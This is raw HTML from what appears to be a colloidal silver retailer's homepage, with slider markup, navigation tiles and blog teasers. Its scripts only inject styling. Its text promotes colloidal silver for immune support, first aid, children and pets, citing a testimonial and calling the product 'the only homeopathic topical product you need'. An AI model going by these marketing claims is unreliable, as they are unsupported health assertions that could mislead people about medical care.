data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 10;"><img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" data-ww="['158px','158px','120px','255px']" data-hh="['285px','285px','216px','459px']" width="1151" height="2078" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2018/05/SS_Kids_2oz-Fine-Mist.png" data-no-retina></div><div class="tp-caption tp-resizeme" id="slide-25-layer-14" data-x="['left','left','left','left']" data-hoffset="['622','520','365','365']" data-y="['top','top','top','top']" data-voffset="['332','326','245','245']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="image" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 11;"><img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" data-ww="['149px','149px','116px','116px']" data-hh="['242px','242px','189px','189px']" width="1151" height="1869" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2018/05/SS-1oz-Gel.png" data-no-retina></div><div class="tp-caption medium_light_black tp-resizeme" id="slide-25-layer-15" data-x="['left','left','center','center']" data-hoffset="['50','50','-182','-448']" data-y="['top','top','top','top']" data-voffset="['250','250','151','76']" data-fontsize="['46','46','30','15']" data-width="['523','523','327','318']" data-height="['none','none','277','none']" data-whitespace="normal" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[,,,]" data-paddingbottom="[,,,]" data-paddingleft="[,,,]" style="z-index: 12; min-width: 523px; max-width: 523px; white-space: normal; font-size: 46px; line-height: 46px; letter-spacing: 0.5px;">"I have tried many colloidal silver products in the past, but nothing works as well as Sovereign Silver."</div> <a class="tp-caption rev-btn tp-resizeme" href="https://sovereignsilver.com/products/" target="_self" id="slide-25-layer-18" data-x="['left','left','left','left']" data-hoffset="['389','389','389','389']" data-y="['top','top','top','top']" data-voffset="['588','588','588','588']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="button" data-actions='' data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"},{"frame":"hover","speed":"0","ease":"Linear.easeNone","to":"o:1;rX:0;rY:0;rZ:0;z:0;","style":"c:rgb(0,0,0);bg:rgb(3,155,255);bs:solid;bw:0 0 0 0;"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[12,12,12,12]" data-paddingright="[35,35,35,35]" data-paddingbottom="[12,12,12,12]" data-paddingleft="[35,35,35,35]" style="z-index: 13; white-space: nowrap; font-size: 17px; line-height: 17px; font-weight: 500; color: rgba(255,255,255,1); letter-spacing: px;font-family:Roboto;background-color:rgb(255,158,27);border-color:rgba(0,0,0,1);outline:none;box-shadow:none;box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;cursor:pointer;text-decoration: none;">SHOP NOW <i class="fa-icon-chevron-right"></i> </a><div class="tp-caption tp-resizeme" id="slide-25-layer-22" data-x="['left','left','left','left']" data-hoffset="['-381','-381','-267','65']" data-y="['top','top','top','top']" data-voffset="['438','438','290','62']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="image" data-responsive_offset="on" data-frames='[{"delay":0,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 14;"><img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" data-ww="['263px','263px','263px','263px']" data-hh="['168px','168px','168px','168px']" width="585" height="374" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2019/01/SS-Line-up-with-Kids-and-Pets.png" data-no-retina></div></li><li data-index="rs-1" data-transition="slidingoverlayhorizontal" data-slotamount="default" data-hideafterloop="0" data-hideslideonmobile="off" data-easein="default" data-easeout="default" data-masterspeed="default" data-thumb="https://sovereignsilver.com/wp-content/uploads/2018/01/slide3-100x50.jpg" data-delay="4000" data-rotate="0" data-saveperformance="off" data-title="Slide" data-param1="Safe,Pure." data-param2=" #1 Selli" data-param3="" data-param4="" data-param5="" data-param6="" data-param7="" data-param8="" data-param9="" data-param10="" data-description="sdsdsdsd sds sdsdsdsdsds"> <img src="https://sovereignsilver.com/wp-content/plugins/revslider/admin/assets/images/dummy.png" alt="" title="Mother Putting Sticking Plaster On Son&#8217;s Arm" width="1750" height="1167" data-lazyload="https://sovereignsilver.com/wp-content/uploads/2018/01/slide3.jpg" data-bgposition="center center" data-bgfit="cover" data-bgrepeat="no-repeat" class="rev-slidebg" data-no-retina><div class="tp-caption tp-shape tp-shapewrapper tp-resizeme" id="slide-1-layer-36" data-x="['left','left','left','left']" data-hoffset="['0','0','0','0']" data-y="['top','top','top','top']" data-voffset="['0','0','0','0']" data-width="full" data-height="full" data-whitespace="nowrap" data-visibility="['off','off','on','on']" data-type="shape" data-basealign="slide" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 5;background-color:rgba(0,0,0,0.1);"></div><div class="tp-caption tp-resizeme" id="slide-1-layer-1" data-x="['center','center','center','center']" data-hoffset="['280','295','295','295']" data-y="['middle','middle','middle','middle']" data-voffset="['-258','-258','-258','-258']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 6; white-space: nowrap; font-size: 40px; line-height: 22px; font-weight: 800; color: #ff3a2d; letter-spacing: 0px;font-family:Open Sans;">First Aid Gel</div><div class="tp-caption tp-resizeme" id="slide-1-layer-16" data-x="['left','left','left','center']" data-hoffset="['777','681','247','0']" data-y="['top','top','top','middle']" data-voffset="['61','52','124','-46']" data-fontsize="['40','25','25','25']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 7; white-space: nowrap; font-size: 40px; line-height: 22px; font-weight: 800; color: #ffffff; letter-spacing: 0px;font-family:Open Sans;">The only homeopathic</div><div class="tp-caption tp-resizeme" id="slide-1-layer-18" data-x="['left','left','left','left']" data-hoffset="['0','100','100','100']" data-y="['top','top','top','top']" data-voffset="['0','100','100','100']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 8; white-space: nowrap; font-size: 20px; line-height: 22px; font-weight: 400; color: #ffffff; letter-spacing: 0px;font-family:Open Sans;"></div><div class="tp-caption tp-resizeme" id="slide-1-layer-19" data-x="['left','left','left','center']" data-hoffset="['781','684','287','0']" data-y="['top','top','top','middle']" data-voffset="['100','90','156','-21']" data-fontsize="['40','25','25','25']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 9; white-space: nowrap; font-size: 40px; line-height: 22px; font-weight: 800; color: #ffffff; letter-spacing: 0px;font-family:Open Sans;">topical product</div><div class="tp-caption tp-resizeme" id="slide-1-layer-32" data-x="['left','left','center','center']" data-hoffset="['783','684','-3','0']" data-y="['top','top','middle','middle']" data-voffset="['136','123','-16','0']" data-fontsize="['40','25','25','25']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="text" data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[0,0,0,0]" data-paddingright="[0,0,0,0]" data-paddingbottom="[0,0,0,0]" data-paddingleft="[0,0,0,0]" style="z-index: 10; white-space: nowrap; font-size: 40px; line-height: 22px; font-weight: 800; color: #ffffff; letter-spacing: 0px;font-family:Open Sans;"> you need</div> <a class="tp-caption rev-btn tp-resizeme" href="https://sovereignsilver.com/products?=#silvergel" target="_self" id="slide-1-layer-34" data-x="['left','left','center','left']" data-hoffset="['1001','684','-3','116']" data-y="['top','top','middle','top']" data-voffset="['170','158','37','143']" data-width="none" data-height="none" data-whitespace="nowrap" data-type="button" data-actions='' data-responsive_offset="on" data-frames='[{"delay":10,"speed":300,"frame":"0","from":"opacity:0;","to":"o:1;","ease":"Power3.easeInOut"},{"delay":"wait","speed":300,"frame":"999","to":"opacity:0;","ease":"Power3.easeInOut"},{"frame":"hover","speed":"0","ease":"Linear.easeNone","to":"o:1;rX:0;rY:0;rZ:0;z:0;","style":"c:rgb(255,255,255);bg:rgb(3,155,255);bs:solid;bw:0 0 0 0;"}]' data-textAlign="['inherit','inherit','inherit','inherit']" data-paddingtop="[12,12,12,12]" data-paddingright="[35,35,35,35]" data-paddingbottom="[12,12,12,12]" data-paddingleft="[35,35,35,35]" style="z-index: 11; white-space: nowrap; font-size: 17px; line-height: 17px; font-weight: 500; color: rgba(255,255,255,1); letter-spacing: px;font-family:Roboto;background-color:rgb(255,158,27);border-color:rgba(0,0,0,1);outline:none;box-shadow:none;box-sizing:border-box;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;cursor:pointer;text-decoration: none;">SHOP NOW <i class="fa-icon-chevron-right"></i> </a></li></ul> <script>var htmlDiv = document.getElementById("rs-plugin-settings-inline-css"); var htmlDivCss=""; if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; }else{ var htmlDiv = document.createElement("div"); htmlDiv.innerHTML = "<style>" + htmlDivCss + "</style>"; document.getElementsByTagName("head")[0].appendChild(htmlDiv.childNodes[0]); }</script> <div class="tp-bannertimer tp-bottom" style="visibility: hidden !important;"></div></div> <script>var htmlDivCss = unescape(".clickable%7Bcursor%3Apointer%3B%7D"); var htmlDiv = document.getElementById('rs-plugin-settings-inline-css'); if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; } else{ var htmlDiv = document.createElement('div'); htmlDiv.innerHTML = '<style>' + htmlDivCss + '</style>'; document.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]); }</script><script>var htmlDivCss = unescape(".hermes.tp-bullets%20%7B%0A%7D%0A%0A.hermes%20.tp-bullet%20%7B%0A%20%20%20%20overflow%3Ahidden%3B%0A%20%20%20%20border-radius%3A50%25%3B%0A%20%20%20%20width%3A16px%3B%0A%20%20%20%20height%3A16px%3B%0A%20%20%20%20background-color%3A%20rgba%280%2C%200%2C%200%2C%200%29%3B%0A%20%20%20%20box-shadow%3A%20inset%200%200%200%202px%20rgb%28255%2C%20255%2C%20255%29%3B%0A%20%20%20%20-webkit-transition%3A%20background%200.3s%20ease%3B%0A%20%20%20%20transition%3A%20background%200.3s%20ease%3B%0A%20%20%20%20position%3Aabsolute%3B%0A%7D%0A%0A.hermes%20.tp-bullet%3Ahover%20%7B%0A%09%20%20background-color%3A%20rgba%280%2C0%2C0%2C0.21%29%3B%0A%7D%0A.hermes%20.tp-bullet%3Aafter%20%7B%0A%20%20content%3A%20%27%20%27%3B%0A%20%20position%3A%20absolute%3B%0A%20%20bottom%3A%200%3B%0A%20%20height%3A%200%3B%0A%20%20left%3A%200%3B%0A%20%20width%3A%20100%25%3B%0A%20%20background-color%3A%20rgb%28255%2C%20255%2C%20255%29%3B%0A%20%20box-shadow%3A%200%200%201px%20rgb%28255%2C%20255%2C%20255%29%3B%0A%20%20-webkit-transition%3A%20height%200.3s%20ease%3B%0A%20%20transition%3A%20height%200.3s%20ease%3B%0A%7D%0A.hermes%20.tp-bullet.selected%3Aafter%20%7B%0A%20%20height%3A100%25%3B%0A%7D%0A%0A"); var htmlDiv = document.getElementById('rs-plugin-settings-inline-css'); if(htmlDiv) { htmlDiv.innerHTML = htmlDiv.innerHTML + htmlDivCss; } else{ var htmlDiv = document.createElement('div'); htmlDiv.innerHTML = '<style>' + htmlDivCss + '</style>'; document.getElementsByTagName('head')[0].appendChild(htmlDiv.childNodes[0]); }</script> </div></div></div><div class="row-fluid page-top-container"><div class="container-fluid"><div class="gallery-masonry row-fluid"><div class="grid row"><div class="grid-sizer"></div><div class="grid-item col-sm-6 col-xs-12"><div class="gal-container"><div class="ndkredcol gal-image"><img src="https://sovereignsilver.com/wp-content/uploads/2019/02/Girl-and-Dog_Family-on-Couch_2-op.jpg" alt="Why Silver?"></div><div class="gal-content"><div class="hs-container"><div class="hs-content"><h2 class="gal-title">Why Silver?</h2><p class="gal-text" >START HERE</p></div></div></div> <a href="https://sovereignsilver.com/silver101/" class="gal-link"></a></div></div><div class="grid-item col-sm-3 col-xs-6"><div class="gal-container"><div class="nltbluecol gal-image"><img src="https://sovereignsilver.com/wp-content/uploads/2019/02/LightBlueBG-op.jpg" alt="The Science of Silver™"></div><div class="gal-content"><div class="hs-container"><div class="hs-content"><h2 class="gal-title">The Science of Silver™</h2><p class="gal-text" ></p></div></div></div> <a href="https://sovereignsilver.com/our-science/" class="gal-link"></a></div></div><div class="grid-item col-sm-3 col-xs-6"><div class="gal-container"><div class="ndkgreycol gal-image"><img src="https://sovereignsilver.com/wp-content/uploads/2019/02/TheLearningCenter-op.jpg" alt="The Learning Center"></div><div class="gal-content"><div class="hs-container"><div class="hs-content"><h2 class="gal-title">The Learning Center</h2><p class="gal-text" ></p></div></div></div> <a href="https://sovereignsilver.com/the-learning-center/" class="gal-link"></a></div></div><div class="grid-item col-sm-3 col-xs-6"><div class="gal-container"><div class="ngreencol gal-image"><img src="https://sovereignsilver.com/wp-content/uploads/2019/02/mscope3-op-1.jpg" alt="Comparison Tool"></div><div class="gal-content"><div class="hs-container"><div class="hs-content"><h2 class="gal-title">Comparison Tool</h2><p class="gal-text" ></p></div></div></div> <a href="https://sovereignsilver.com/product-comparison-tool/" class="gal-link"></a></div></div><div class="grid-item col-sm-3 col-xs-6"><div class="gal-container"><div class="ndkredcol gal-image"><img src="https://sovereignsilver.com/wp-content/uploads/2019/02/YourStories-op.jpg" alt="Your Stories"></div><div class="gal-content"><div class="hs-container"><div class="hs-content"><h2 class="gal-title">Your Stories</h2><p class="gal-text" ></p></div></div></div> <a href="https://sovereignsilver.com/testimonials/" class="gal-link"></a></div></div><div class="grid-item col-sm-3 col-xs-6"><div class="gal-container"><div class="ngreencol gal-image"><img src="https://sovereignsilver.com/wp-content/uploads/2019/02/ourlabssquare-2.jpg" alt="Our Labs"></div><div class="gal-content"><div class="hs-container"><div class="hs-content"><h2 class="gal-title">Our Labs</h2><p class="gal-text" ></p></div></div></div> <a href="https://sovereignsilver.com/our-labs/" class="gal-link"></a></div></div><div class="grid-item col-sm-3"><div class="gal-container"><div class="nltgreycol gal-image"><img src="https://sovereignsilver.com/wp-content/uploads/2017/08/ltgrey-2.png" alt="Contact"></div><div class="gal-content"><div class="hs-container"><div class="hs-content"><h2 class="gal-title">Contact</h2><p class="gal-text" >Get in touch with us!</p></div></div></div> <a href="https://sovereignsilver.com/contact-us/" class="gal-link"></a></div></div><div class="grid-item col-sm-3 col-xs-6"><div class="gal-container"><div class="ndkbluecol gal-image"><img src="https://sovereignsilver.com/wp-content/uploads/2019/02/silver-chalice-duotone_web-1.jpg" alt="History of Silver"></div><div class="gal-content"><div class="hs-container"><div class="hs-content"><h2 class="gal-title">History of Silver</h2><p class="gal-text" ></p></div></div></div> <a href="https://sovereignsilver.com/silver101/history-of-silver/" class="gal-link"></a></div></div><div class="grid-item col-sm-3 col-xs-6 safety"><div class="gal-container"><div class="nltbluecol gal-image"><img src="https://sovereignsilver.com/wp-content/uploads/2019/02/Safety-2.jpg" alt="Safety"></div><div class="gal-content"><div class="hs-container"><div class="hs-content"><h2 class="gal-title">Safety</h2><p class="gal-text" ></p></div></div></div> <a href="https://sovereignsilver.com/silver101/safety-toxicity/" class="gal-link"></a></div></div><div class="grid-item col-sm-6"><div class="gal-container"><div class="ndkgreycol gal-image"><img src="https://sovereignsilver.com/wp-content/uploads/2019/02/FAQ-3-op.jpg" alt="FAQ"></div><div class="gal-content"><div class="hs-container"><div class="hs-content"><h2 class="gal-title">FAQ</h2><p class="gal-text" ></p></div></div></div> <a href="https://sovereignsilver.com/faqs/" class="gal-link"></a></div></div><div class="grid-item col-sm-3"><div class="gal-container"><div class="nltredcol gal-image"><img src="https://sovereignsilver.com/wp-content/uploads/2017/08/ltred-1.png" alt="Join the Sovereign Life™ Community"></div><div class="gal-content"><div class="hs-container"><div class="hs-content"><h2 class="gal-title">Join the Sovereign Life™ Community</h2><p class="gal-text" ></p></div></div></div> <a href="https://sovereignsilver.com/join-the-sovereign-life-community/" class="gal-link"></a></div></div></div></div><div class="row item-list-row"><div class="col-sm-1 hm_mobile">&nbsp;</div><div class="col-sm-2"><div class="item-list-gird"> <a href="/product/bio-active-silver-hydrosol/"><img alt="Services" src="https://sovereignsilver.com/wp-content/uploads/2017/08/support.png"></a><h4><a href="/product/bio-active-silver-hydrosol/">Immune Support</a></h4><p></p></div></div><div class="col-sm-2"><div class="item-list-gird"> <a href="https://sovereignsilver.com/product/silver-first-aid-gel/"><img alt="Services" src="https://sovereignsilver.com/wp-content/uploads/2017/08/first-aid-1.png"></a><h4><a href="https://sovereignsilver.com/product/silver-first-aid-gel/">First Aid</a></h4><p></p></div></div><div class="col-sm-2"><div class="item-list-gird"> <a href="https://sovereignsilver.com/product/sovereign-silver-for-kids/"><img alt="Services" src="https://sovereignsilver.com/wp-content/uploads/2017/08/boy3.png"></a><h4><a href="https://sovereignsilver.com/product/sovereign-silver-for-kids/">Kids</a></h4><p></p></div></div><div class="col-sm-2"><div class="item-list-gird"> <a href="https://sovereignsilver.com/product/sovereign-silver-for-pets/"><img alt="Services" src="https://sovereignsilver.com/wp-content/uploads/2017/08/paw.png"></a><h4><a href="https://sovereignsilver.com/product/sovereign-silver-for-pets/">Pets</a></h4><p></p></div></div><div class="col-sm-2"><div class="item-list-gird"> <a href="https://sovereignsilver.com/the-learning-center/"><img alt="Services" src="https://sovereignsilver.com/wp-content/uploads/2017/08/graduation-cap.png"></a><h4><a href="https://sovereignsilver.com/the-learning-center/">Learn More</a></h4><p></p></div></div><div class="col-sm-1 hm_mobile">&nbsp;</div></div></div></div><div class="row-fluid blog-section full-width"><div class="container-fluid"><div class="page-head"><h2><a href="../blog">Sovereign Life Blog</a></h2></div><div class="row blog-row"><div class="col-sm-4"><div class="blog-grid"><div class="blog-image"> <a href="https://sovereignsilver.com/particle-size-matters-why-less-is-more/"><img width="1423" height="800" data-src="https://sovereignsilver.com/wp-content/uploads/2019/05/Particle-Size-Matters-Video-Cover-Image-e1557861618338.jpg" class="attachment-full size-full wp-post-image lazyload" alt="TEM images showing small and large particle sizes with a photo of Dr. Rob" sizes="100vw" style="--aspect-ratio:1.77875;" /></a></div><div class="blog-content"><div class="blog-info"><ul><li>By Dr. Robert MacCuspie</li><li>May 14, 2019</li></ul></div><h3><a href="https://sovereignsilver.com/particle-size-matters-why-less-is-more/">Particle Size Matters: Why Less is More</a></h3><p class="text-excerpt">Dr. Rob demonstrates in this video how silver particle size matters in a fun way that even those of us who didn't like science class can understand.</p><div class="post-btn"><a href="https://sovereignsilver.com/particle-size-matters-why-less-is-more/">Read More</a></div></div></div></div><div class="col-sm-4"><div class="blog-grid"><div class="blog-image"> <a href="https://sovereignsilver.com/3-unconventional-methods-for-self-care-on-a-time-crunch/"><img width="1200" height="800" data-srcset="https://sovereignsilver.com/wp-content/uploads/2019/05/Self-Care-on-a-Time-Crunch-3-Unconventional-Methods-for-Caring-for-Yourself.jpg 1200w, https://sovereignsilver.com/wp-content/uploads/2019/05/Self-Care-on-a-Time-Crunch-3-Unconventional-Methods-for-Caring-for-Yourself-300x200.jpg 300w, https://sovereignsilver.com/wp-content/uploads/2019/05/Self-Care-on-a-Time-Crunch-3-Unconventional-Methods-for-Caring-for-Yourself-768x512.jpg 768w, https://sovereignsilver.com/wp-content/uploads/2019/05/Self-Care-on-a-Time-Crunch-3-Unconventional-Methods-for-Caring-for-Yourself-1024x683.jpg 1024w, https://sovereignsilver.com/wp-content/uploads/2019/05/Self-Care-on-a-Time-Crunch-3-Unconventional-Methods-for-Caring-for-Yourself-50x33.jpg 50w, https://sovereignsilver.com/wp-content/uploads/2019/05/Self-Care-on-a-Time-Crunch-3-Unconventional-Methods-for-Caring-for-Yourself-100x67.jpg 100w, https://sovereignsilver.com/wp-content/uploads/2019/05/Self-Care-on-a-Time-Crunch-3-Unconventional-Methods-for-Caring-for-Yourself-360x240.jpg 360w" data-src="https://sovereignsilver.com/wp-content/uploads/2019/05/Self-Care-on-a-Time-Crunch-3-Unconventional-Methods-for-Caring-for-Yourself.jpg" class="attachment-full size-full wp-post-image lazyload" alt="Self-Care on a Time Crunch" sizes="100vw" style="--aspect-ratio:1.5;" /></a></div><div class="blog-content"><div class="blog-info"><ul><li>By Sovereign Silver</li><li>May 08, 2019</li></ul></div><h3><a href="https://sovereignsilver.com/3-unconventional-methods-for-self-care-on-a-time-crunch/">3 Unconventional Methods for Self-Care on a Time Crunch</a></h3><p class="text-excerpt">Self-care often sounds amazing in theory, but the reality of creating time for yourself is often an afterthought at the end of a long day.</p><div class="post-btn"><a href="https://sovereignsilver.com/3-unconventional-methods-for-self-care-on-a-time-crunch/">Read More</a></div></div></div></div><div class="col-sm-4"><div class="blog-grid"><div class="blog-image"> <a href="https://sovereignsilver.com/can-you-see-the-forest-through-the-trees/"><img width="1200" height="800" data-srcset="https://sovereignsilver.com/wp-content/uploads/2019/05/blog-intro.jpg 1200w, https://sovereignsilver.com/wp-content/uploads/2019/05/blog-intro-300x200.jpg 300w, https://sovereignsilver.com/wp-content/uploads/2019/05/blog-intro-768x512.jpg 768w, https://sovereignsilver.com/wp-content/uploads/2019/05/blog-intro-1024x683.jpg 1024w, https://sovereignsilver.com/wp-content/uploads/2019/05/blog-intro-50x33.jpg 50w, https://sovereignsilver.com/wp-content/uploads/2019/05/blog-intro-100x67.jpg 100w, https://sovereignsilver.com/wp-content/uploads/2019/05/blog-intro-360x240.jpg 360w" data-src="https://sovereignsilver.com/wp-content/uploads/2019/05/blog-intro.jpg" class="attachment-full size-full wp-post-image lazyload" alt="" sizes="100vw" style="--aspect-ratio:1.5;" /></a></div><div class="blog-content"><div class="blog-info"><ul><li>By Sovereign Silver</li><li>May 02, 2019</li></ul></div><h3><a href="https://sovereignsilver.com/can-you-see-the-forest-through-the-trees/">Can You See the Forest Through the Trees?</a></h3><p class="text-excerpt">Are you ready to hear the results from our partnership with One Tree Planted to bring back the incredible power of trees to areas of deforested land? The answer is only a click away!</p><div class="post-btn"><a href="https://sovereignsilver.com/can-you-see-the-forest-through-the-trees/">Read More</a></div></div></div></div><div class="col-sm-4"><div class="blog-grid"><div class="blog-image"> <a href="https://sovereignsilver.com/where-is-silver-found-in-nature/"><img width="1200" height="800" data-srcset="https://sovereignsilver.com/wp-content/uploads/2019/04/Silver-in-Nature-WEB.png 1200w, https://sovereignsilver.com/wp-content/uploads/2019/04/Silver-in-Nature-WEB-300x200.png 300w, https://sovereignsilver.com/wp-content/uploads/2019/04/Silver-in-Nature-WEB-768x512.png 768w, https://sovereignsilver.com/wp-content/uploads/2019/04/Silver-in-Nature-WEB-1024x683.png 1024w, https://sovereignsilver.com/wp-content/uploads/2019/04/Silver-in-Nature-WEB-50x33.png 50w, https://sovereignsilver.com/wp-content/uploads/2019/04/Silver-in-Nature-WEB-100x67.png 100w, https://sovereignsilver.com/wp-content/uploads/2019/04/Silver-in-Nature-WEB-360x240.png 360w" data-src="https://sovereignsilver.com/wp-content/uploads/2019/04/Silver-in-Nature-WEB.png" class="attachment-full size-full wp-post-image lazyload" alt="dandelion made of silver particles" sizes="100vw" style="--aspect-ratio:1.5;" /></a></div><div class="blog-content"><div class="blog-info"><ul><li>By Sovereign Silver</li><li>Apr 18, 2019</li></ul></div><h3><a href="https://sovereignsilver.com/where-is-silver-found-in-nature/">Where is Silver Found in Nature?</a></h3><p class="text-excerpt">Did you know that silver can be found as a trace mineral in some of the natural foods we eat? Learn more about where silver naturally occurs in nature in this article.</p><div class="post-btn"><a href="https://sovereignsilver.com/where-is-silver-found-in-nature/">Read More</a></div></div></div></div><div class="col-sm-4"><div class="blog-grid"><div class="blog-image"> <a href="https://sovereignsilver.com/health-food-stores-your-local-wellness-connection/"><img width="1200" height="800" data-srcset="https://sovereignsilver.com/wp-content/uploads/2019/04/Health-Food-Store.png 1200w, https://sovereignsilver.com/wp-content/uploads/2019/04/Health-Food-Store-300x200.png 300w, https://sovereignsilver.com/wp-content/uploads/2019/04/Health-Food-Store-768x512.png 768w, https://sovereignsilver.com/wp-content/uploads/2019/04/Health-Food-Store-1024x683.png 1024w, https://sovereignsilver.com/wp-content/uploads/2019/04/Health-Food-Store-50x33.png 50w, https://sovereignsilver.com/wp-content/uploads/2019/04/Health-Food-Store-100x67.png 100w, https://sovereignsilver.com/wp-content/uploads/2019/04/Health-Food-Store-360x240.png 360w" data-src="https://sovereignsilver.com/wp-content/uploads/2019/04/Health-Food-Store.png" class="attachment-full size-full wp-post-image lazyload" alt="young girl cashier" sizes="100vw" style="--aspect-ratio:1.5;" /></a></div><div class="blog-content"><div class="blog-info"><ul><li>By Sovereign Silver</li><li>Apr 18, 2019</li></ul></div><h3><a href="https://sovereignsilver.com/health-food-stores-your-local-wellness-connection/">Health Food Stores: Your Local Wellness Connection</a></h3><p class="text-excerpt">Our newest blog post highlights the benefits of local health food stores and why they should be your first choice on your path to health sovereignty.</p><div class="post-btn"><a href="https://sovereignsilver.com/health-food-stores-your-local-wellness-connection/">Read More</a></div></div></div></div><div class="col-sm-4"><div class="blog-grid"><div class="blog-image"> <a href="https://sovereignsilver.com/how-to-get-your-kids-excited-about-being-healthy/"><img width="1200" height="800" data-srcset="https://sovereignsilver.com/wp-content/uploads/2019/03/How-to-Get-Kids-Excited-About-Being-Healthy.png 1200w, https://sovereignsilver.com/wp-content/uploads/2019/03/How-to-Get-Kids-Excited-About-Being-Healthy-300x200.png 300w, https://sovereignsilver.com/wp-content/uploads/2019/03/How-to-Get-Kids-Excited-About-Being-Healthy-768x512.png 768w, https://sovereignsilver.com/wp-content/uploads/2019/03/How-to-Get-Kids-Excited-About-Being-Healthy-1024x683.png 1024w, https://sovereignsilver.com/wp-content/uploads/2019/03/How-to-Get-Kids-Excited-About-Being-Healthy-50x33.png 50w, https://sovereignsilver.com/wp-content/uploads/2019/03/How-to-Get-Kids-Excited-About-Being-Healthy-100x67.png 100w, https://sovereignsilver.com/wp-content/uploads/2019/03/How-to-Get-Kids-Excited-About-Being-Healthy-360x240.png 360w" data-src="https://sovereignsilver.com/wp-content/uploads/2019/03/How-to-Get-Kids-Excited-About-Being-Healthy.png" class="attachment-full size-full wp-post-image lazyload" alt="little girl with red bell peppers as glasses" 